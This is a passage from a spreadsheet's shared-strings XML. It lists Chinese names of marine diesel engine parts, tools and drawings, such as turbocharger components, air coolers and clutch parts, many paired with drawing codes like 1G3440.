  </si>
  <si>
    <t xml:space="preserve">燃油阀座打磨工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">磨环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">阀安装工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">901面板工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">902面板工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">904面板工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">905面板工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">906面板工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">908面板工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">909面板工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">910面板工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">912面板工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">901工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">902工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">904工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">905工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">906工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">908工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">909工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">910工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">912工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">减速齿轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑油出口上法兰                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滑油出口下法兰                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滑油出口橡胶板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">加强环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">螺纹管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">型板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">型管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">增压单元支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">加热管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">顶部支撑螺栓                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶部支撑安装螺栓                                          </t>
  </si>
  <si>
    <t xml:space="preserve">保护支架板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">顶部支撑摩擦垫片                                          </t>
  </si>
  <si>
    <t xml:space="preserve">顶部支撑定距管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">定距连接内板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">定距连接外板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连接垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">叉形定距块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">管子叉形板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺母叉形板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">建议保护板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">保护帽管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">保护帽盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液压张紧螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">减振器支柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扶手                                                </t>
  </si>
  <si>
    <t xml:space="preserve">继电器模块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">校准螺杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支撑锲块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔圆螺母                                             </t>
  </si>
  <si>
    <t xml:space="preserve">球形垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">球形螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调整螺钉孔螺塞                                           </t>
  </si>
  <si>
    <t xml:space="preserve">侧锲块安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">端锲形螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">帽盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧锲块衬垫                                           </t>
  </si>
  <si>
    <t xml:space="preserve">侧锲块衬垫锁紧板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧侧锲块衬垫                                          </t>
  </si>
  <si>
    <t xml:space="preserve">端锲块衬垫                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体对齐安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座机架对齐                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中冷器供图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扩压环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">啮合部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压气机外壳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺杆外壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮出口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">检查盖板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">不明数据信息                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封空气垫料                                            </t>
  </si>
  <si>
    <t xml:space="preserve">隔断墙                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气进口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封空气盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮进口部件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器底脚                                             </t>
  </si>
  <si>
    <t xml:space="preserve">消音器护套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">消音器板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">绝热                                                </t>
  </si>
  <si>
    <t xml:space="preserve">压力计螺钉                                             </t>
  </si>
  <si>
    <t xml:space="preserve">密封板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扩压叶片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扩压器板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴环叶片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴环中心位置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">内环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">外环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">排气扩压环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴颈轴承壳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油泵详细资料                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮端轴承体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚球轴承衬套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">填料函轴衬                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">观察孔壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">棘爪                                                </t>
  </si>
  <si>
    <t xml:space="preserve">水管结合配件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴环清洗法兰                                           </t>
  </si>
  <si>
    <t xml:space="preserve">转子轴毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴颈毛坯                                              </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮盘毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">预转子                                               </t>
  </si>
  <si>
    <t xml:space="preserve">预转子毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮叶片毛坯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">转子叶片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">减振拉筋                                              </t>
  </si>
  <si>
    <t xml:space="preserve">固定环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">紧扣环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器详细资料                                           </t>
  </si>
  <si>
    <t xml:space="preserve">覆层说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">分壳                                                </t>
  </si>
  <si>
    <t xml:space="preserve">换向室                                               </t>
  </si>
  <si>
    <t xml:space="preserve">侧室                                                </t>
  </si>
  <si>
    <t xml:space="preserve">管板端盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管板换向室                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器供图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气滤器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空冷器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器壳体密封                                           </t>
  </si>
  <si>
    <t xml:space="preserve">清洗盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">换向室-水                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">放气布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气流换向室                                             </t>
  </si>
  <si>
    <t xml:space="preserve">定位螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器端盖垫片                                           </t>
  </si>
  <si>
    <t xml:space="preserve">换向室垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">拆卸工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">清洗管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">清洗管装置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机外轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">末端轴承抬升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平衡重螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">离合器螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">自由端平衡重                                            </t>
  </si>
  <si>
    <t xml:space="preserve">输出端平衡重                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气总管管架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">胶水                                                </t>
  </si>
  <si>
    <t xml:space="preserve">硅油                                                </t>
  </si>
  <si>
    <t xml:space="preserve">压力软管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">再循环装置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气瓶                                             </t>
  </si>
  <si>
    <t xml:space="preserve">淡水泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">智能控制系统风扇                                          </t>
  </si>
  <si>
    <t xml:space="preserve">鼓风机壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电机                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滑轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风机规格                                           </t>
  </si>
  <si>
    <t xml:space="preserve">分离器单元                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃烧空气管布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">交流发电机空气出口                                         </t>
  </si>
  <si>
    <t xml:space="preserve">驱动轮                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压气机单元                                             </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑油分离器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">预热单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主控制台                                              </t>
  </si>
  <si>
    <t xml:space="preserve">分配器壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">放气管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气分配器盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞滑阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">起动凸轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锁止臂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">转子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">换向盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">分配气盘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">关闭盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器齿轮箱                                        </t>
  </si>
  <si>
    <t xml:space="preserve">推拉杆螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推拉杆端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器轴                                          </t>
  </si>
  <si>
    <t xml:space="preserve">分配器盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">灭火支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机上管子                                              </t>
  </si>
  <si>
    <t xml:space="preserve">蝶阀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">变更说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管螺纹套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盲铆钉                                               </t>
  </si>
  <si>
    <t xml:space="preserve">海棉状橡胶                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">液位指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺旋线圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">可调单向阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">恒温阀元件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">发电机冷却管支架                                          </t>
  </si>
  <si>
    <t xml:space="preserve">支架固定件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">温度计支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油滴盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机座中间块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">恒温阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">膜片弹簧阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带执行器的蝶阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">切断环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">弯头                                                </t>
  </si>
  <si>
    <t xml:space="preserve">三通弯头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管法兰                                               </t>
  </si>
  <si>
    <t xml:space="preserve">预热器支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水管支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">集油池                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力表软管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带执行器的三通阀                                          </t>
  </si>
  <si>
    <t xml:space="preserve">油位观察孔                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泄漏警报                                              </t>
  </si>
  <si>
    <t xml:space="preserve">针阀                                                </t>
  </si>
  <si>
    <t>1G0040</t>
  </si>
  <si>
    <t>1G0041</t>
  </si>
  <si>
    <t xml:space="preserve">自由端PTO尺寸图                                         </t>
  </si>
  <si>
    <t>1G0042</t>
  </si>
  <si>
    <t xml:space="preserve">输出端PTO尺寸图                                         </t>
  </si>
  <si>
    <t>1G0043</t>
  </si>
  <si>
    <t>1G0049</t>
  </si>
  <si>
    <t xml:space="preserve">环氧树脂垫块基座图                                         </t>
  </si>
  <si>
    <t>1G0060</t>
  </si>
  <si>
    <t>1G0062</t>
  </si>
  <si>
    <t>1G0066</t>
  </si>
  <si>
    <t xml:space="preserve">基座调节螺栓                                            </t>
  </si>
  <si>
    <t>1G0067</t>
  </si>
  <si>
    <t xml:space="preserve">试车台基座布置图                                          </t>
  </si>
  <si>
    <t>1G0069</t>
  </si>
  <si>
    <t>1G0070</t>
  </si>
  <si>
    <t>1G0102</t>
  </si>
  <si>
    <t>1G0112</t>
  </si>
  <si>
    <t>1G0134</t>
  </si>
  <si>
    <t>1G0206</t>
  </si>
  <si>
    <t xml:space="preserve">PTO数据                                             </t>
  </si>
  <si>
    <t>1G0930</t>
  </si>
  <si>
    <t>1G1000</t>
  </si>
  <si>
    <t>1G1002</t>
  </si>
  <si>
    <t>1G1020</t>
  </si>
  <si>
    <t>1G1021</t>
  </si>
  <si>
    <t>1G1023</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱中间铸件                                           </t>
  </si>
  <si>
    <t>1G1024</t>
  </si>
  <si>
    <t>1G1026</t>
  </si>
  <si>
    <t>1G1027</t>
  </si>
  <si>
    <t>1G1030</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱，上部铸件                                          </t>
  </si>
  <si>
    <t>1G1031</t>
  </si>
  <si>
    <t>1G1033</t>
  </si>
  <si>
    <t>1G1034</t>
  </si>
  <si>
    <t xml:space="preserve">轴承支撑-前端                                           </t>
  </si>
  <si>
    <t>1G1080</t>
  </si>
  <si>
    <t xml:space="preserve">轴承支撑-后端                                           </t>
  </si>
  <si>
    <t>1G1081</t>
  </si>
  <si>
    <t>1G1082</t>
  </si>
  <si>
    <t>1G1083</t>
  </si>
  <si>
    <t>1G1084</t>
  </si>
  <si>
    <t>1G1085</t>
  </si>
  <si>
    <t>1G1086</t>
  </si>
  <si>
    <t>1G1100</t>
  </si>
  <si>
    <t>1G1102</t>
  </si>
  <si>
    <t>1G1200</t>
  </si>
  <si>
    <t xml:space="preserve">自由端盖                                              </t>
  </si>
  <si>
    <t>1G1210</t>
  </si>
  <si>
    <t xml:space="preserve">自由端后端盖                                            </t>
  </si>
  <si>
    <t>1G1212</t>
  </si>
  <si>
    <t>1G1216</t>
  </si>
  <si>
    <t xml:space="preserve">自由端PTO盖                                           </t>
  </si>
  <si>
    <t>1G1218</t>
  </si>
  <si>
    <t>1G1220</t>
  </si>
  <si>
    <t xml:space="preserve">输出端后端盖                                            </t>
  </si>
  <si>
    <t>1G1222</t>
  </si>
  <si>
    <t>1G1224</t>
  </si>
  <si>
    <t xml:space="preserve">输出端PTO盖                                           </t>
  </si>
  <si>
    <t>1G1228</t>
  </si>
  <si>
    <t>1G1248</t>
  </si>
  <si>
    <t>1G1260</t>
  </si>
  <si>
    <t>1G1262</t>
  </si>
  <si>
    <t xml:space="preserve">盖预加工                                              </t>
  </si>
  <si>
    <t>1G1280</t>
  </si>
  <si>
    <t xml:space="preserve">盖铸件                                               </t>
  </si>
  <si>
    <t>1G1282</t>
  </si>
  <si>
    <t>1G1290</t>
  </si>
  <si>
    <t>1G2105</t>
  </si>
  <si>
    <t>1G2125</t>
  </si>
  <si>
    <t>1G2126</t>
  </si>
  <si>
    <t>1G2127</t>
  </si>
  <si>
    <t>1G2145</t>
  </si>
  <si>
    <t>1G2200</t>
  </si>
  <si>
    <t>1G2203</t>
  </si>
  <si>
    <t xml:space="preserve">离合器缸                                              </t>
  </si>
  <si>
    <t>1G2213</t>
  </si>
  <si>
    <t xml:space="preserve">离合器缸预加工                                           </t>
  </si>
  <si>
    <t>1G2214</t>
  </si>
  <si>
    <t>1G2217</t>
  </si>
  <si>
    <t xml:space="preserve">分离环预加工                                            </t>
  </si>
  <si>
    <t>1G2218</t>
  </si>
  <si>
    <t>1G2220</t>
  </si>
  <si>
    <t xml:space="preserve">离合器圆盘预加工                                          </t>
  </si>
  <si>
    <t>1G2221</t>
  </si>
  <si>
    <t>1G2320</t>
  </si>
  <si>
    <t xml:space="preserve">活塞法兰预加工                                           </t>
  </si>
  <si>
    <t>1G2321</t>
  </si>
  <si>
    <t>1G2345</t>
  </si>
  <si>
    <t>1G2349</t>
  </si>
  <si>
    <t>1G2400</t>
  </si>
  <si>
    <t>1G2402</t>
  </si>
  <si>
    <t xml:space="preserve">衬套-预加工                                            </t>
  </si>
  <si>
    <t>1G2403</t>
  </si>
  <si>
    <t>1G2436</t>
  </si>
  <si>
    <t>1G2440</t>
  </si>
  <si>
    <t>1G2515</t>
  </si>
  <si>
    <t>1G2520</t>
  </si>
  <si>
    <t>1G2530</t>
  </si>
  <si>
    <t>1G2535</t>
  </si>
  <si>
    <t>1G3021</t>
  </si>
  <si>
    <t>1G3028</t>
  </si>
  <si>
    <t xml:space="preserve">导向阀连接器                                            </t>
  </si>
  <si>
    <t>1G3067</t>
  </si>
  <si>
    <t xml:space="preserve">导向阀滤器                                             </t>
  </si>
  <si>
    <t>1G3069</t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀连接件                                            </t>
  </si>
  <si>
    <t>1G3087</t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀开关                                             </t>
  </si>
  <si>
    <t>1G3088</t>
  </si>
  <si>
    <t>1G3120</t>
  </si>
  <si>
    <t>1G3121</t>
  </si>
  <si>
    <t>1G3125</t>
  </si>
  <si>
    <t>1G3140</t>
  </si>
  <si>
    <t>1G3141</t>
  </si>
  <si>
    <t xml:space="preserve">放气滤器安装                                            </t>
  </si>
  <si>
    <t>1G3205</t>
  </si>
  <si>
    <t xml:space="preserve">放气滤器                                              </t>
  </si>
  <si>
    <t>1G3206</t>
  </si>
  <si>
    <t xml:space="preserve">预滤器垫片                                             </t>
  </si>
  <si>
    <t>1G3218</t>
  </si>
  <si>
    <t xml:space="preserve">预过滤器垫片                                            </t>
  </si>
  <si>
    <t>1G3219</t>
  </si>
  <si>
    <t>1G3244</t>
  </si>
  <si>
    <t>1G3245</t>
  </si>
  <si>
    <t>1G3249</t>
  </si>
  <si>
    <t>1G3254</t>
  </si>
  <si>
    <t>1G3312</t>
  </si>
  <si>
    <t xml:space="preserve">油泵管对接法兰                                           </t>
  </si>
  <si>
    <t>1G3314</t>
  </si>
  <si>
    <t>1G3334</t>
  </si>
  <si>
    <t>1G3335</t>
  </si>
  <si>
    <t>1G3338</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器端盖铸件                                          </t>
  </si>
  <si>
    <t>1G3339</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器输送板                                           </t>
  </si>
  <si>
    <t>1G3343</t>
  </si>
  <si>
    <t xml:space="preserve">输送板垫片                                             </t>
  </si>
  <si>
    <t>1G3344</t>
  </si>
  <si>
    <t>1G3345</t>
  </si>
  <si>
    <t>1G3346</t>
  </si>
  <si>
    <t xml:space="preserve">油蓄压器接头                                            </t>
  </si>
  <si>
    <t>1G3364</t>
  </si>
  <si>
    <t xml:space="preserve">油蓄压器支架                                            </t>
  </si>
  <si>
    <t>1G3365</t>
  </si>
  <si>
    <t>1G3409</t>
  </si>
  <si>
    <t xml:space="preserve">控制单元门盖                                            </t>
  </si>
  <si>
    <t>1G3410</t>
  </si>
  <si>
    <t>1G3412</t>
  </si>
  <si>
    <t xml:space="preserve">十字头罩壳                                             </t>
  </si>
  <si>
    <t>1G3413</t>
  </si>
  <si>
    <t>1G3417</t>
  </si>
  <si>
    <t>1G3431</t>
  </si>
  <si>
    <t>1G3433</t>
  </si>
  <si>
    <t xml:space="preserve">十字头叉形臂                                            </t>
  </si>
  <si>
    <t>1G3436</t>
  </si>
  <si>
    <t xml:space="preserve">执行机构连接杆                                           </t>
  </si>
  <si>
    <t>1G3438</t>
  </si>
  <si>
    <t xml:space="preserve">连接杆衬套                                             </t>
  </si>
  <si>
    <t>1G3440</t>
  </si>
  <si>
    <t xml:space="preserve">十字头定位控制-桨距控制                                      </t>
  </si>
  <si>
    <t>1G3441</t>
  </si>
  <si>
    <t>1G3450</t>
  </si>
  <si>
    <t xml:space="preserve">换向机构连接杆                                           </t>
  </si>
  <si>
    <t>1G3478</t>
  </si>
  <si>
    <t>1G3504</t>
  </si>
  <si>
    <t>1G3509</t>
  </si>
  <si>
    <t>1G3510</t>
  </si>
  <si>
    <t>1G3511</t>
  </si>
  <si>
    <t>1G3512</t>
  </si>
  <si>
    <t xml:space="preserve">油套管支架总成                                           </t>
  </si>
  <si>
    <t>1G3540</t>
  </si>
  <si>
    <t>1G3542</t>
  </si>
  <si>
    <t>1G3600</t>
  </si>
  <si>
    <t>1G3601</t>
  </si>
  <si>
    <t xml:space="preserve">量油尺塞子                                             </t>
  </si>
  <si>
    <t>1G3605</t>
  </si>
  <si>
    <t xml:space="preserve">电缆支架                                              </t>
  </si>
  <si>
    <t>1G3654</t>
  </si>
  <si>
    <t>1G3655</t>
  </si>
  <si>
    <t>1G3702</t>
  </si>
  <si>
    <t>1G3804</t>
  </si>
  <si>
    <t>1G3808</t>
  </si>
  <si>
    <t>1G3824</t>
  </si>
  <si>
    <t>1G3828</t>
  </si>
  <si>
    <t>1G3844</t>
  </si>
  <si>
    <t>1G3848</t>
  </si>
  <si>
    <t xml:space="preserve">离合器油管法兰                                           </t>
  </si>
  <si>
    <t>1G3864</t>
  </si>
  <si>
    <t xml:space="preserve">离合器油管支架                                           </t>
  </si>
  <si>
    <t>1G3868</t>
  </si>
  <si>
    <t>1G5048</t>
  </si>
  <si>
    <t>1G5049</t>
  </si>
  <si>
    <t>1G5083</t>
  </si>
  <si>
    <t>1G5085</t>
  </si>
  <si>
    <t>1G5088</t>
  </si>
  <si>
    <t>1G5089</t>
  </si>
  <si>
    <t>1G5114</t>
  </si>
  <si>
    <t>1G5202</t>
  </si>
  <si>
    <t xml:space="preserve">投油规程-传动                                           </t>
  </si>
  <si>
    <t>1G5250</t>
  </si>
  <si>
    <t>1G5252</t>
  </si>
  <si>
    <t>1G5254</t>
  </si>
  <si>
    <t xml:space="preserve">冲洗过滤袋                                             </t>
  </si>
  <si>
    <t>1G5262</t>
  </si>
  <si>
    <t xml:space="preserve">冲洗过滤篮                                             </t>
  </si>
  <si>
    <t>1G5264</t>
  </si>
  <si>
    <t>1G9000</t>
  </si>
  <si>
    <t xml:space="preserve">横向臂                                               </t>
  </si>
  <si>
    <t>1G9003</t>
  </si>
  <si>
    <t>1G9007</t>
  </si>
  <si>
    <t>1G9010</t>
  </si>
  <si>
    <t>1G9011</t>
  </si>
  <si>
    <t>1G9200</t>
  </si>
  <si>
    <t>1G9220</t>
  </si>
  <si>
    <t xml:space="preserve">角弯接头                                              </t>
  </si>
  <si>
    <t>1G9280</t>
  </si>
  <si>
    <t xml:space="preserve">带螺母的角弯接头                                          </t>
  </si>
  <si>
    <t>1G9281</t>
  </si>
  <si>
    <t xml:space="preserve">部件清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑和冷却油                                            </t>
  </si>
  <si>
    <t xml:space="preserve">海水冷却                                              </t>
  </si>
  <si>
    <t xml:space="preserve">外部管系连接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机顶撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油箱垫地脚螺栓                                           </t>
  </si>
  <si>
    <t xml:space="preserve">各种备件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">奥格斯堡图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">管子图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机数据                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴润滑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气                                                </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却                                              </t>
  </si>
  <si>
    <t xml:space="preserve">中央冷却1                                             </t>
  </si>
  <si>
    <t xml:space="preserve">中央冷却2                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">桥楼控制                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机仪表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">报警和安全设备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压缩空气                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器清洗                                             </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机连接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴线                                                </t>
  </si>
  <si>
    <t xml:space="preserve">机舱吊车                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱灭火                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主机需要的空间                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油漆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">试车                                                </t>
  </si>
  <si>
    <t xml:space="preserve">码头试验和试航                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气                                                </t>
  </si>
  <si>
    <t xml:space="preserve">中央冷却                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主机和辅机系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">备件清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶部支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">垫片.密封.O形圈                                         </t>
  </si>
  <si>
    <t xml:space="preserve">底座环氧锲块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">双杆顶部支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴静态负荷                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PTO系统                                             </t>
  </si>
  <si>
    <t xml:space="preserve">TCS/PTO/PTI系统                                     </t>
  </si>
  <si>
    <t xml:space="preserve">扭振仪布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">接地设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安装图A                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安装图B                                              </t>
  </si>
  <si>
    <t xml:space="preserve">项目文件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机舱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">试车和试航                                             </t>
  </si>
  <si>
    <t xml:space="preserve">备件                                                </t>
